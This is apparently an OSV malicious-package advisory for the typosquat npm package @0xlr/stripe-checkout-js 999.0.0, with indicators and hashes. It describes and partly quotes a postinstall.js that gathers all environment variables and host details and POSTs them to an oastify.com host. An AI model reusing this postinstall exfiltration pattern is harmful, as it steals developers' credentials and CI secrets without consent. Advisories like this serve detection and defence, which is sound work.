{"id":"MAL-2026-5388","summary":"Malicious code in @0xlr/stripe-checkout-js (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (65b2bf8dcdc0fc9b8fdbf14bbf58a011707a4425cf0029867e28067c08ef5566)\nOn `npm install`, postinstall.js enumerates the full process.env keyspace plus host identifiers (os.hostname(), username, homedir, cwd, argv, OS details) and POSTs the resulting JSON payload over HTTPS to `rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com` — a Burp Collaborator out-of-band subdomain used as attacker-controlled exfiltration infrastructure. The relevant code is `Object.keys(process.env).sort().forEach(k =\u003e { env[k] = process.env[k]; })` followed by `https.request({hostname: 'rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com', port: 443,..., method: 'POST'})`. On developer and CI hosts, process.env routinely contains credential-grade values (AWS_*, NPM_TOKEN, GITHUB_TOKEN, CI/CD secrets), all of which are captured and shipped off-host without consent. The package name typosquats the legitimate `stripe-checkout-js`, and the version (999.0.0) is consistent with a placeholder/squat release rather than a real maintained library.\n","modified":"2026-06-09T17:16:28.972344981Z","published":"2026-06-09T16:07:30Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","import_time":"2026-06-09T16:59:45.171006742Z","modified_time":"2026-06-09T16:07:30Z","id":"IN-MAL-2026-004970","versions":["999.0.0"],"sha256":"44686181e7933593b67bda202e35b54f8d9927ac721f1836bcf91a7ee7ec00ff"},{"source":"amazon-inspector","import_time":"2026-06-09T16:59:45.125117471Z","modified_time":"2026-06-09T16:07:30Z","id":"IN-MAL-2026-004969","versions":["999.0.0"],"sha256":"65b2bf8dcdc0fc9b8fdbf14bbf58a011707a4425cf0029867e28067c08ef5566"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@0xlr/stripe-checkout-js/v/999.0.0"}],"affected":[{"package":{"name":"@0xlr/stripe-checkout-js","ecosystem":"npm","purl":"pkg:npm/%400xlr%2Fstripe-checkout-js"},"versions":["999.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@0xlr/stripe-checkout-js/MAL-2026-5388.json","indicators":{"domains":["rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com"],"evidence_files":[{"tlsh":"762115e152f4867413f23b88b09e95015677f1173a0778f4bdcd52151fac62812f2579","sha256":"1ded8a789cf3732b19e4d08f9f8b224a4c81914daad56d165ca4fbce8cf21e07","path":"postinstall.js"}],"package_integrity":[{"hashes":{"sha1":"00eae02c4d1a0d7050ff4ab7d79f4d6b007a8a8d","sha512_sri":"sha512-/Hnw/Gt3/JDVqZDYgbPnRSeKD1n1bDZaLogF+oUQEzKhtD3lD+E5WAyv5Xx5Mi19EUI/37l24RQvYwSO3OyIgQ=="},"filename":"stripe-checkout-js-999.0.0.tgz"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}